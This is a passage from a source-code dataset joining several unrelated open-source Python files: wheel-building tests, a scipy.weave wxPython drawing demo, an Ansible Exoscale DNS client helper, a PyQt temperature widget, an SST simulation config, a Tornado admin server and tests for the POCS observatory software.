    temp_pkg.join('setup.cfg').write('[bdist_wheel]\npython_tag=py32')
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py32-')
    assert wheels[0].ext == '.whl'


def test_legacy_wheel_section_in_setup_cfg(temp_pkg):
    """The deprecated [wheel] section is still read for universal=1."""
    temp_pkg.join('setup.cfg').write('[wheel]\nuniversal=1')
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.startswith('Test-1.0-py2.py3-')
    assert wheels[0].ext == '.whl'
def test_plat_name_purepy(temp_pkg):
    """--plat-name is applied (dots become underscores) even for pure wheels."""
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=testplat.pure'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.endswith('-testplat_pure.whl')
    assert wheels[0].ext == '.whl'


def test_plat_name_ext(temp_ext_pkg):
    """--plat-name is applied to wheels containing a compiled extension."""
    try:
        subprocess.check_call(
            [sys.executable, 'setup.py', 'bdist_wheel', '--plat-name=testplat.arch'],
            cwd=str(temp_ext_pkg))
    except subprocess.CalledProcessError:
        # No C toolchain available on this machine.
        pytest.skip("Cannot compile C Extensions")
    dist_dir = temp_ext_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.endswith('-testplat_arch.whl')
    assert wheels[0].ext == '.whl'


def test_plat_name_purepy_in_setupcfg(temp_pkg):
    """plat_name in setup.cfg works for pure wheels."""
    temp_pkg.join('setup.cfg').write('[bdist_wheel]\nplat_name=testplat.pure')
    subprocess.check_call(
        [sys.executable, 'setup.py', 'bdist_wheel'],
        cwd=str(temp_pkg))
    dist_dir = temp_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.endswith('-testplat_pure.whl')
    assert wheels[0].ext == '.whl'


def test_plat_name_ext_in_setupcfg(temp_ext_pkg):
    """plat_name in setup.cfg works for extension wheels."""
    temp_ext_pkg.join('setup.cfg').write('[bdist_wheel]\nplat_name=testplat.arch')
    try:
        subprocess.check_call(
            [sys.executable, 'setup.py', 'bdist_wheel'],
            cwd=str(temp_ext_pkg))
    except subprocess.CalledProcessError:
        # No C toolchain available on this machine.
        pytest.skip("Cannot compile C Extensions")
    dist_dir = temp_ext_pkg.join('dist')
    assert dist_dir.check(dir=1)
    wheels = dist_dir.listdir()
    assert len(wheels) == 1
    assert wheels[0].basename.endswith('-testplat_arch.whl')
    assert wheels[0].ext == '.whl'
|
Shaswat27/scipy | refs/heads/master | scipy/weave/examples/wx_example.py | 100 | """ This is taken from the scrolled window example from the demo.
Take a look at the DoDrawing2() method below. The first 6 lines
or so have been translated into C++.
"""
from __future__ import absolute_import, print_function
import sys
sys.path.insert(0,'..')
import inline_tools
from wxPython.wx import *
class MyCanvas(wxScrolledWindow):
    """Scrolled drawing canvas (Python 2 / old wxPython API).

    DoDrawing draws entirely in Python; DoDrawing2 renders its first few
    calls through inline C++ via scipy.weave instead.  Mouse dragging
    sketches green lines that are kept in self.lines and replayed on
    repaint.
    """

    def __init__(self, parent, id=-1, size=wxDefaultSize):
        wxScrolledWindow.__init__(self, parent, id, wxPoint(0, 0), size, wxSUNKEN_BORDER)
        self.lines = []
        # Virtual canvas size in pixels; also drives the scrollbar range.
        self.maxWidth = 1000
        self.maxHeight = 1000
        self.SetBackgroundColour(wxNamedColor("WHITE"))
        EVT_LEFT_DOWN(self, self.OnLeftButtonEvent)
        EVT_LEFT_UP(self, self.OnLeftButtonEvent)
        EVT_MOTION(self, self.OnLeftButtonEvent)
        EVT_PAINT(self, self.OnPaint)
        self.SetCursor(wxStockCursor(wxCURSOR_PENCIL))
        # bmp = images.getTest2Bitmap()
        # mask = wxMaskColour(bmp, wxBLUE)
        # bmp.SetMask(mask)
        # self.bmp = bmp
        self.SetScrollbars(20, 20, self.maxWidth/20, self.maxHeight/20)

    def getWidth(self):
        return self.maxWidth

    def getHeight(self):
        return self.maxHeight

    def OnPaint(self, event):
        dc = wxPaintDC(self)
        self.PrepareDC(dc)
        self.DoDrawing2(dc)

    def DoDrawing(self, dc):
        """Pure-Python reference implementation of the demo drawing."""
        dc.BeginDrawing()
        dc.SetPen(wxPen(wxNamedColour('RED')))
        dc.DrawRectangle(5, 5, 50, 50)
        dc.SetBrush(wxLIGHT_GREY_BRUSH)
        dc.SetPen(wxPen(wxNamedColour('BLUE'), 4))
        dc.DrawRectangle(15, 15, 50, 50)
        dc.SetFont(wxFont(14, wxSWISS, wxNORMAL, wxNORMAL))
        dc.SetTextForeground(wxColour(0xFF, 0x20, 0xFF))
        te = dc.GetTextExtent("Hello World")
        dc.DrawText("Hello World", 60, 65)
        dc.SetPen(wxPen(wxNamedColour('VIOLET'), 4))
        dc.DrawLine(5, 65+te[1], 60+te[0], 65+te[1])
        lst = [(100,110), (150,110), (150,160), (100,160)]
        dc.DrawLines(lst, -60)
        dc.SetPen(wxGREY_PEN)
        dc.DrawPolygon(lst, 75)
        dc.SetPen(wxGREEN_PEN)
        dc.DrawSpline(lst+[(100,100)])
        # dc.DrawBitmap(self.bmp, 200, 20, true)
        # dc.SetTextForeground(wxColour(0, 0xFF, 0x80))
        # dc.DrawText("a bitmap", 200, 85)
        font = wxFont(20, wxSWISS, wxNORMAL, wxNORMAL)
        dc.SetFont(font)
        dc.SetTextForeground(wxBLACK)
        for a in range(0, 360, 45):
            dc.DrawRotatedText("Rotated text...", 300, 300, a)
        dc.SetPen(wxTRANSPARENT_PEN)
        dc.SetBrush(wxBLUE_BRUSH)
        dc.DrawRectangle(50,500,50,50)
        dc.DrawRectangle(100,500,50,50)
        dc.SetPen(wxPen(wxNamedColour('RED')))
        dc.DrawEllipticArc(200, 500, 50, 75, 0, 90)
        self.DrawSavedLines(dc)
        dc.EndDrawing()

    def DoDrawing2(self, dc):
        """Same drawing as DoDrawing, but the first few calls run as
        inline C++ compiled by scipy.weave."""
        red = wxNamedColour("RED")
        blue = wxNamedColour("BLUE")
        grey_brush = wxLIGHT_GREY_BRUSH
        code = \
            """
            //#line 108 "wx_example.py"
            dc->BeginDrawing();
            dc->SetPen(wxPen(*red,4,wxSOLID));
            dc->DrawRectangle(5, 5, 50, 50);
            dc->SetBrush(*grey_brush);
            dc->SetPen(wxPen(*blue, 4,wxSOLID));
            dc->DrawRectangle(15, 15, 50, 50);
            """
        inline_tools.inline(code,['dc','red','blue','grey_brush'],verbose=2)
        dc.SetFont(wxFont(14, wxSWISS, wxNORMAL, wxNORMAL))
        dc.SetTextForeground(wxColour(0xFF, 0x20, 0xFF))
        te = dc.GetTextExtent("Hello World")
        dc.DrawText("Hello World", 60, 65)
        dc.SetPen(wxPen(wxNamedColour('VIOLET'), 4))
        dc.DrawLine(5, 65+te[1], 60+te[0], 65+te[1])
        lst = [(100,110), (150,110), (150,160), (100,160)]
        dc.DrawLines(lst, -60)
        dc.SetPen(wxGREY_PEN)
        dc.DrawPolygon(lst, 75)
        dc.SetPen(wxGREEN_PEN)
        dc.DrawSpline(lst+[(100,100)])
        # dc.DrawBitmap(self.bmp, 200, 20, true)
        # dc.SetTextForeground(wxColour(0, 0xFF, 0x80))
        # dc.DrawText("a bitmap", 200, 85)
        font = wxFont(20, wxSWISS, wxNORMAL, wxNORMAL)
        dc.SetFont(font)
        dc.SetTextForeground(wxBLACK)
        for a in range(0, 360, 45):
            dc.DrawRotatedText("Rotated text...", 300, 300, a)
        dc.SetPen(wxTRANSPARENT_PEN)
        dc.SetBrush(wxBLUE_BRUSH)
        dc.DrawRectangle(50,500,50,50)
        dc.DrawRectangle(100,500,50,50)
        dc.SetPen(wxPen(wxNamedColour('RED')))
        dc.DrawEllipticArc(200, 500, 50, 75, 0, 90)
        self.DrawSavedLines(dc)
        dc.EndDrawing()

    def DrawSavedLines(self, dc):
        """Replay every line sketched so far with the mouse."""
        dc.SetPen(wxPen(wxNamedColour('MEDIUM FOREST GREEN'), 4))
        for line in self.lines:
            for coords in line:
                apply(dc.DrawLine, coords)

    def SetXY(self, event):
        # Remember the event position in scrolled (canvas) coordinates.
        self.x, self.y = self.ConvertEventCoords(event)

    def ConvertEventCoords(self, event):
        """Translate window event coordinates into canvas coordinates."""
        xView, yView = self.GetViewStart()
        xDelta, yDelta = self.GetScrollPixelsPerUnit()
        return (event.GetX() + (xView * xDelta),
                event.GetY() + (yView * yDelta))

    def OnLeftButtonEvent(self, event):
        """Sketch with the left mouse button: press starts a line,
        dragging extends it, release stores it in self.lines."""
        if event.LeftDown():
            self.SetXY(event)
            self.curLine = []
            self.CaptureMouse()
        elif event.Dragging():
            dc = wxClientDC(self)
            self.PrepareDC(dc)
            dc.BeginDrawing()
            dc.SetPen(wxPen(wxNamedColour('MEDIUM FOREST GREEN'), 4))
            coords = (self.x, self.y) + self.ConvertEventCoords(event)
            self.curLine.append(coords)
            apply(dc.DrawLine, coords)
            self.SetXY(event)
            dc.EndDrawing()
        elif event.LeftUp():
            self.lines.append(self.curLine)
            self.curLine = []
            self.ReleaseMouse()
#---------------------------------------------------------------------------
# This example isn't currently used.
class py_canvas(wx.wxWindow):
    """Minimal window whose background colour is set via inline C++
    (scipy.weave); kept only as an example, not used by the demo."""

    def __init__(self, parent, id=-1, pos=wx.wxPyDefaultPosition,
                 size=wx.wxPyDefaultSize, **attr):
        wx.wxWindow.__init__(self, parent, id, pos,size)
        # wx.EVT_PAINT(self,self.on_paint)
        background = wx.wxNamedColour('white')
        code = """
               self->SetBackgroundColour(*background);
               """
        inline_tools.inline(code,['self','background'],compiler='msvc')
#----------------------------------------------------------------------------
class MyFrame(wxFrame):
    """Top-level frame hosting a single MyCanvas."""

    def __init__(self, parent, ID, title, pos=wxDefaultPosition,
                 size=wxDefaultSize, style=wxDEFAULT_FRAME_STYLE):
        wxFrame.__init__(self, parent, ID, title, pos, size, style)
        # panel = wxPanel(self, -1)
        self.GetSize()
        # button = wxButton(panel, 1003, "Close Me")
        # button.SetPosition(wxPoint(15, 15))
        # EVT_BUTTON(self, 1003, self.OnCloseMe)
        # EVT_CLOSE(self, self.OnCloseWindow)
        # canvas = py_canvas(self,-1)
        canvas = MyCanvas(self,-1)
        canvas.Show(true)
class MyApp(wxApp):
    """Application object: creates and shows the demo frame."""

    def OnInit(self):
        win = MyFrame(NULL, -1, "This is a wxFrame", size=(350, 200),
                      style = wxDEFAULT_FRAME_STYLE)  # | wxFRAME_TOOL_WINDOW )
        win.Show(true)
        return true
if __name__ == "__main__":
    # Run the demo application.
    app = MyApp(0)
    app.MainLoop()
|
UniversalMasterEgg8679/ansible | refs/heads/devel | lib/ansible/module_utils/exoscale.py | 88 | # -*- coding: utf-8 -*-
#
# (c) 2016, René Moser <mail@renemoser.net>
#
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
# import module snippets
from ansible.module_utils.pycompat24 import get_exception
from ansible.module_utils.six.moves import configparser
from ansible.module_utils.six import integer_types, string_types
from ansible.module_utils._text import to_text
from ansible.module_utils.urls import fetch_url
EXO_DNS_BASEURL = "https://api.exoscale.ch/dns/v1"
def exo_dns_argument_spec():
    """Return the AnsibleModule argument spec shared by Exoscale DNS modules."""
    return {
        'api_key': {'default': None, 'no_log': True},
        'api_secret': {'default': None, 'no_log': True},
        'api_timeout': {'type': 'int', 'default': 10},
        'api_region': {'default': 'cloudstack'},
        'validate_certs': {'default': 'yes', 'type': 'bool'},
    }
def exo_dns_required_together():
    """Parameters that must be supplied together: the API key and secret."""
    credential_pair = ['api_key', 'api_secret']
    return [credential_pair]
class ExoDns(object):
    """Thin client for the Exoscale DNS REST API used by Ansible modules.

    Credentials come from module parameters or, failing that, from the
    CloudStack-style environment variables / ini files.
    """

    def __init__(self, module):
        self.module = module
        self.api_key = self.module.params.get('api_key')
        self.api_secret = self.module.params.get('api_secret')
        if not (self.api_key and self.api_secret):
            # Fall back to CloudStack-style configuration sources.
            try:
                region = self.module.params.get('api_region')
                config = self.read_config(ini_group=region)
                self.api_key = config['key']
                self.api_secret = config['secret']
            except Exception:
                e = get_exception()
                self.module.fail_json(msg="Error while processing config: %s" % e)

        self.headers = {
            'X-DNS-Token': "%s:%s" % (self.api_key, self.api_secret),
            'Content-Type': 'application/json',
            'Accept': 'application/json',
        }
        # Standard Ansible result skeleton, including diff support.
        self.result = {
            'changed': False,
            'diff': {
                'before': {},
                'after': {},
            }
        }

    def read_config(self, ini_group=None):
        """Read API credentials from environment variables or ini files.

        Environment variables win if the complete set is present;
        otherwise cloudstack.ini / ~/.cloudstack.ini (and the file named
        by CLOUDSTACK_CONFIG) are consulted, last read winning.
        """
        if not ini_group:
            ini_group = os.environ.get('CLOUDSTACK_REGION', 'cloudstack')
        keys = ['key', 'secret']
        env_conf = {}
        for key in keys:
            if 'CLOUDSTACK_%s' % key.upper() not in os.environ:
                # Incomplete environment configuration; use ini files.
                break
            else:
                env_conf[key] = os.environ['CLOUDSTACK_%s' % key.upper()]
        else:
            # for/else: every variable was found in the environment.
            return env_conf

        # Config file: $PWD/cloudstack.ini or $HOME/.cloudstack.ini
        # Last read wins in configparser
        paths = (
            os.path.join(os.path.expanduser('~'), '.cloudstack.ini'),
            os.path.join(os.getcwd(), 'cloudstack.ini'),
        )
        # Look at CLOUDSTACK_CONFIG first if present
        if 'CLOUDSTACK_CONFIG' in os.environ:
            paths += (os.path.expanduser(os.environ['CLOUDSTACK_CONFIG']),)
        if not any([os.path.exists(c) for c in paths]):
            self.module.fail_json(msg="Config file not found. Tried : %s" % ", ".join(paths))
        conf = configparser.ConfigParser()
        conf.read(paths)
        return dict(conf.items(ini_group))

    def api_query(self, resource="/domains", method="GET", data=None):
        """Issue one request against the DNS API and return the parsed JSON.

        Any non-2xx status or unparsable body fails the module.
        """
        url = EXO_DNS_BASEURL + resource
        if data:
            data = self.module.jsonify(data)

        response, info = fetch_url(
            module=self.module,
            url=url,
            data=data,
            method=method,
            headers=self.headers,
            timeout=self.module.params.get('api_timeout'),
        )

        if info['status'] not in (200, 201, 204):
            self.module.fail_json(msg="%s returned %s, with body: %s" % (url, info['status'], info['msg']))

        try:
            return self.module.from_json(to_text(response.read()))
        except Exception:
            e = get_exception()
            self.module.fail_json(msg="Could not process response into json: %s" % e)

    def has_changed(self, want_dict, current_dict, only_keys=None):
        """Compare desired vs. current state, recording diffs as it goes.

        Strings are compared case-insensitively; None values and keys
        outside *only_keys* (when given) are ignored.  Returns True when
        any relevant value differs or is new.
        """
        changed = False
        for key, value in want_dict.items():

            # Optionally limit by a list of keys
            if only_keys and key not in only_keys:
                continue

            # Skip None values
            if value is None:
                continue

            if key in current_dict:
                if isinstance(current_dict[key], integer_types):
                    if value != current_dict[key]:
                        self.result['diff']['before'][key] = current_dict[key]
                        self.result['diff']['after'][key] = value
                        changed = True
                elif isinstance(current_dict[key], string_types):
                    if value.lower() != current_dict[key].lower():
                        self.result['diff']['before'][key] = current_dict[key]
                        self.result['diff']['after'][key] = value
                        changed = True
                else:
                    self.module.fail_json(msg="Unable to determine comparison for key %s" % key)
            else:
                # Key does not exist yet: creating it is a change.
                self.result['diff']['after'][key] = value
                changed = True
        return changed
|
pliniopereira/ccd10 | refs/heads/master | src/ui/mainWindow/tempMonitor.py | 1 | from PyQt5 import QtWidgets
from src.business.schedulers.SchedTemperature import SchedTemperature
from src.ui.commons.layout import set_hbox
class TempMonitor(QtWidgets.QWidget):
    """Widget showing the camera temperature, refreshed by a scheduler job."""

    def __init__(self, parent=None):
        super(TempMonitor, self).__init__(parent)
        # Label updated in place by SchedTemperature's periodic job.
        self.tempMonitor = QtWidgets.QLabel(self)
        self.Sched = SchedTemperature(self.tempMonitor)
        self.label = QtWidgets.QLabel("Temperature: ", self)
        self.setLayout(set_hbox(self.label, self.tempMonitor, stretch=1))

    def stop_monitor(self):
        """Stop the periodic temperature refresh job."""
        self.Sched.stop_job()

    def start_monitor(self):
        """Start the periodic temperature refresh job."""
        self.Sched.start_job()
|
Hiregui92/openacademy-project | refs/heads/master | openacademy/__init__.py | 30 | from . import model
from . import wizard
|
tactcomplabs/gc64-hmcsim | refs/heads/master | test/sst/7.2.0/goblin_singlestream2-trace.py | 2 | import sst
# SST simulation config: a Miranda single-stream CPU behind an L1 cache backed
# by a GoblinHMCSim memory controller, with HMC tracing enabled.
# Define SST core options
sst.setProgramOption("timebase", "1ps")
sst.setProgramOption("stopAtCycle", "0 ns")
# Define the simulation components
comp_cpu = sst.Component("cpu", "miranda.BaseCPU")
comp_cpu.addParams({
 "verbose" : 0,
 "generator" : "miranda.SingleStreamGenerator",
 "generatorParams.verbose" : 0,
 "generatorParams.startat" : 3,
 "generatorParams.count" : 500000,
 "generatorParams.max_address" : 512000,
 "printStats" : 1,
})
# Tell SST what statistics handling we want
sst.setStatisticLoadLevel(4)
# Enable statistics outputs
comp_cpu.enableAllStatistics({"type":"sst.AccumulatorStatistic"})
comp_l1cache = sst.Component("l1cache", "memHierarchy.Cache")
comp_l1cache.addParams({
 "access_latency_cycles" : "2",
 "cache_frequency" : "2 Ghz",
 "replacement_policy" : "lru",
 "coherence_protocol" : "MESI",
 "associativity" : "4",
 "cache_line_size" : "64",
 "prefetcher" : "cassini.StridePrefetcher",
 "debug" : "1",
 "L1" : "1",
 "cache_size" : "2KB"
})
# Enable statistics outputs
comp_l1cache.enableAllStatistics({"type":"sst.AccumulatorStatistic"})
comp_memory = sst.Component("memory", "memHierarchy.MemController")
comp_memory.addParams({
 "coherence_protocol" : "MESI",
 "backend.access_time" : "1000 ns",
 "backend.mem_size" : "512MiB",
 "clock" : "1GHz",
 "backendConvertor" : "memHierarchy.extMemBackendConvertor",
 "backend" : "memHierarchy.goblinHMCSim",
 "backend.device_count" : "1",
 "backend.link_count" : "4",
 "backend.vault_count" : "32",
 "backend.queue_depth" : "64",
 "backend.bank_count" : "16",
 "backend.dram_count" : "20",
 "backend.capacity_per_device" : "4",
 "backend.xbar_depth" : "128",
 "backend.max_req_size" : "128",
 # trace-* flags turn on the HMCSim trace streams (banks, queues, commands,
 # latency and stall events) -- this is what distinguishes this config from
 # the non-trace variant.
 "backend.trace-banks" : "1",
 "backend.trace-queue" : "1",
 "backend.trace-cmds" : "1",
 "backend.trace-latency" : "1",
 "backend.trace-stalls" : "1"
})
# Define the simulation links
link_cpu_cache_link = sst.Link("link_cpu_cache_link")
link_cpu_cache_link.connect( (comp_cpu, "cache_link", "1000ps"), (comp_l1cache, "high_network_0", "1000ps") )
link_cpu_cache_link.setNoCut()
link_mem_bus_link = sst.Link("link_mem_bus_link")
link_mem_bus_link.connect( (comp_l1cache, "low_network_0", "50ps"), (comp_memory, "direct_link", "50ps") )
|
ilexius/odoo | refs/heads/master | addons/auth_signup/__init__.py | 43 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
import controllers
import res_config
import res_users
|
antmat/cocaine-tools | refs/heads/master | cocaine/proxy/utilserver.py | 2 | import logging
from tornado import web
class PingHandler(web.RequestHandler):  # pylint: disable=W0223
    """Liveness probe endpoint: always answers the literal body ``OK``."""
    def get(self):
        self.write("OK")
class LogLevel(web.RequestHandler):  # pylint: disable=W0223
    """Read (GET) or change (POST) the log level of the proxy loggers."""

    def get(self):
        """Report the effective level of the application's logger."""
        current = self.application.logger.getEffectiveLevel()
        self.write(logging.getLevelName(current))

    def post(self):
        """Apply the level named in the ``level`` argument to all proxy loggers."""
        requested = self.get_argument("level")
        level = getattr(logging, requested.upper(), None)
        if level is None:
            # Unknown level name: report and bail out without changing anything.
            self.write("No such level %s" % requested)
            return
        for logger_name in ("cocaine.proxy.general", "cocaine.proxy.access", "cocaine.baseservice"):
            logging.getLogger(logger_name).setLevel(level)
        self.write("level %s has been set" % logging.getLevelName(level))
class InfoHandler(web.RequestHandler):  # pylint: disable=W0223
    """Expose the proxy's info() structure as the response body."""
    def get(self):
        info = self.application.proxy.info()
        self.write(info)
class UtilServer(web.Application):  # pylint: disable=W0223
    """Administrative HTTP application bundling the proxy utility handlers."""

    def __init__(self, proxy):
        self.proxy = proxy
        self.logger = logging.getLogger("proxy.utilserver")
        routes = [(r"/ping", PingHandler),
                  (r"/info", InfoHandler),
                  (r"/logger", LogLevel)]
        super(UtilServer, self).__init__(handlers=routes)

    def log_request(self, handler):
        """Log each finished request: status, summary and elapsed milliseconds."""
        elapsed_ms = handler.request.request_time() * 1000.0
        self.logger.info("%d %s %.2fms", handler.get_status(),
                         handler._request_summary(), elapsed_ms)
|
panoptes/POCS | refs/heads/develop | tests/test_pocs.py | 1 | import os
import threading
import time
import pytest
import requests
from astropy import units as u
from panoptes.pocs import hardware
from panoptes.pocs.core import POCS
from panoptes.pocs.observatory import Observatory
from panoptes.utils.config.client import set_config
from panoptes.utils.serializers import to_json, to_yaml
from panoptes.pocs.mount import create_mount_simulator
from panoptes.pocs.dome import create_dome_simulator
from panoptes.pocs.camera import create_cameras_from_config
from panoptes.pocs.scheduler import create_scheduler_from_config
from panoptes.pocs.utils.location import create_location_from_config
def reset_conf(config_host, config_port):
    """Ask the panoptes config server to restore its default configuration."""
    endpoint = f'http://{config_host}:{config_port}/reset-config'
    payload = to_json({'reset': True})
    headers = {'Content-Type': 'application/json'}
    reply = requests.post(endpoint, data=payload, headers=headers)
    assert reply.ok
@pytest.fixture(scope='function')
def cameras():
    """Simulated cameras built from the test config."""
    return create_cameras_from_config()
@pytest.fixture(scope='function')
def mount():
    """A simulator mount."""
    return create_mount_simulator()
@pytest.fixture(scope='function')
def pocstime_night():
    """A POCSTIME value that the tests treat as night-time."""
    return "2020-01-01 08:00:00"
@pytest.fixture(scope='function')
def pocstime_day():
    """A POCSTIME value that the tests treat as daytime."""
    return "2020-01-01 22:00:00"
@pytest.fixture(scope='function')
def site_details():
    """Observing location info (includes the 'observer' entry used below)."""
    return create_location_from_config()
@pytest.fixture(scope='function')
def scheduler(site_details):
    """Scheduler bound to the test site's observer."""
    return create_scheduler_from_config(observer=site_details['observer'])
@pytest.fixture(scope='function')
def observatory(cameras, mount, site_details, scheduler):
    """Return a valid Observatory instance with a specific config."""
    obs = Observatory(scheduler=scheduler, simulator=['power', 'weather'])
    for cam_name, cam in cameras.items():
        obs.add_camera(cam_name, cam)
    obs.set_mount(mount)
    return obs
@pytest.fixture(scope='function')
def dome():
    """A simulator dome, with the matching config entries set."""
    set_config('dome', {
        'brand': 'Simulacrum',
        'driver': 'simulator',
    })
    return create_dome_simulator()
@pytest.fixture(scope='function')
def pocs(observatory, config_host, config_port):
    """A run-once POCS instance; powers down and resets config on teardown."""
    os.environ['POCSTIME'] = '2020-01-01 08:00:00'
    pocs = POCS(observatory, run_once=True, simulators=['power'])
    yield pocs
    pocs.power_down()
    reset_conf(config_host, config_port)
@pytest.fixture(scope='function')
def pocs_with_dome(pocs, dome):
    # Add dome to config
    os.environ['POCSTIME'] = '2020-01-01 08:00:00'
    pocs.observatory.set_dome(dome)
    yield pocs
    pocs.power_down()
# Observation used by the night-time tests. NOTE(review): the original
# comment said "valid during the day", which appears swapped with the
# fixture below -- confirm against the test usage.
@pytest.fixture(scope='module')
def valid_observation():
    return {"field": {'name': 'TEST TARGET',
                      'position': '100.00 deg +00.887 deg'},
            "observation": {'priority': '100',
                            'exptime': 2,
                            'min_nexp': 2,
                            'exp_set_size': 2}}
# Observation used by the test that starts in daytime. NOTE(review): the
# original comment said "valid at night" -- appears swapped; confirm.
@pytest.fixture(scope='module')
def valid_observation_day():
    return {"field": {'name': 'TEST TARGET',
                      'position': '300.00 deg +70.887 deg'},
            "observation": {'priority': '100',
                            'exptime': 2,
                            'min_nexp': 2,
                            'exp_set_size': 2}}
def test_observatory_cannot_observe(pocs):
    """initialize() must fail without a scheduler and succeed (repeatedly) with one."""
    scheduler = pocs.observatory.scheduler
    pocs.observatory.scheduler = None
    assert pocs.initialize() is False
    pocs.observatory.scheduler = scheduler
    assert pocs.initialize()
    assert pocs.is_initialized
    # Make sure we can do it twice.
    assert pocs.initialize()
    assert pocs.is_initialized
def test_simple_simulator(pocs, caplog):
    """Basic lifecycle: run() refuses before initialize; trigger lookup works."""
    assert isinstance(pocs, POCS)
    pocs.set_config('simulator', 'all')
    assert pocs.is_initialized is not True
    # Not initialized returns false and gives warning.
    assert pocs.run() is False
    log_record = caplog.records[-1]
    assert log_record.message == 'POCS not initialized' and log_record.levelname == "WARNING"
    pocs.initialize()
    assert pocs.is_initialized
    pocs.state = 'parking'
    pocs.next_state = 'parking'
    assert pocs._lookup_trigger() == 'set_park'
    # An unknown state falls back to the 'parking' trigger.
    pocs.state = 'foo'
    assert pocs._lookup_trigger() == 'parking'
    assert pocs.is_safe()
def test_is_weather_and_dark_simulator(pocs, pocstime_night, pocstime_day):
    """is_dark() honors POCSTIME only when the 'night' simulator is disabled."""
    pocs.initialize()
    # Night simulator
    pocs.set_config('simulator', 'all')
    os.environ['POCSTIME'] = pocstime_night  # is dark
    assert pocs.is_dark() is True
    os.environ['POCSTIME'] = pocstime_day  # is day
    assert pocs.is_dark() is True
    # No night simulator
    pocs.set_config('simulator', hardware.get_all_names(without=['night']))
    os.environ['POCSTIME'] = pocstime_night  # is dark
    assert pocs.is_dark() is True
    os.environ['POCSTIME'] = pocstime_day  # is day
    assert pocs.is_dark() is False
    pocs.set_config('simulator', ['camera', 'mount', 'weather', 'night'])
    assert pocs.is_weather_safe() is True
def test_is_weather_safe_no_simulator(pocs):
    """Weather readings go stale: a recent 'safe' record passes, an old one fails."""
    pocs.initialize()
    pocs.set_config('simulator', hardware.get_all_names(without=['weather']))
    # Set a specific time
    os.environ['POCSTIME'] = '2020-01-01 18:00:00'
    # Insert a dummy weather record
    pocs.db.insert_current('weather', {'safe': True})
    assert pocs.is_weather_safe() is True
    # Set a time 301 seconds later, past the staleness window.
    # (The original comment said 181 seconds; 18:00:00 -> 18:05:01 is 301 s.)
    os.environ['POCSTIME'] = '2020-01-01 18:05:01'
    assert pocs.is_weather_safe() is False
def test_no_ac_power(pocs):
    """has_ac_power() follows the latest 'power' DB record and its staleness."""
    # Simulator makes AC power safe
    assert pocs.has_ac_power() is True
    # Remove 'power' from simulator
    pocs.set_config('simulator', hardware.get_all_names(without=['power']))
    pocs.initialize()
    # With simulator removed the power should fail
    assert pocs.has_ac_power() is False
    for v in [True, 12.4, 0., False]:
        has_power = bool(v)
        # Add a fake power entry in data base
        pocs.db.insert_current('power', {'main': v})
        # Check for safe entry in database
        assert pocs.has_ac_power() == has_power
        assert pocs.is_safe() == has_power
        # Check for stale entry in database
        assert pocs.has_ac_power(stale=0.1) is False
        # But double check it still matches longer entry
        assert pocs.has_ac_power() == has_power
        # Remove entry and try again
        pocs.db.clear_current('power')
        assert pocs.has_ac_power() is False
def test_power_down_while_running(pocs):
    """power_down() from 'ready' parks the mount and disconnects."""
    assert pocs.connected is True
    assert not pocs.observatory.has_dome
    pocs.initialize()
    pocs.get_ready()
    assert pocs.state == 'ready'
    pocs.power_down()
    assert pocs.observatory.mount.is_parked
    assert pocs.connected is False
def test_power_down_dome_while_running(pocs_with_dome):
    """power_down() also disconnects an attached dome."""
    pocs = pocs_with_dome
    assert pocs.connected is True
    assert pocs.observatory.has_dome
    assert not pocs.observatory.dome.is_connected
    pocs.initialize()
    assert pocs.observatory.dome.is_connected
    pocs.get_ready()
    assert pocs.state == 'ready'
    pocs.power_down()
    assert pocs.observatory.mount.is_parked
    assert pocs.connected is False
    assert not pocs.observatory.dome.is_connected
def test_run_no_targets_and_exit(pocs):
    """With no observations available, a run ends back in 'sleeping'."""
    os.environ['POCSTIME'] = '2020-01-01 19:00:00'
    pocs.set_config('simulator', 'all')
    pocs.state = 'sleeping'
    pocs.initialize()
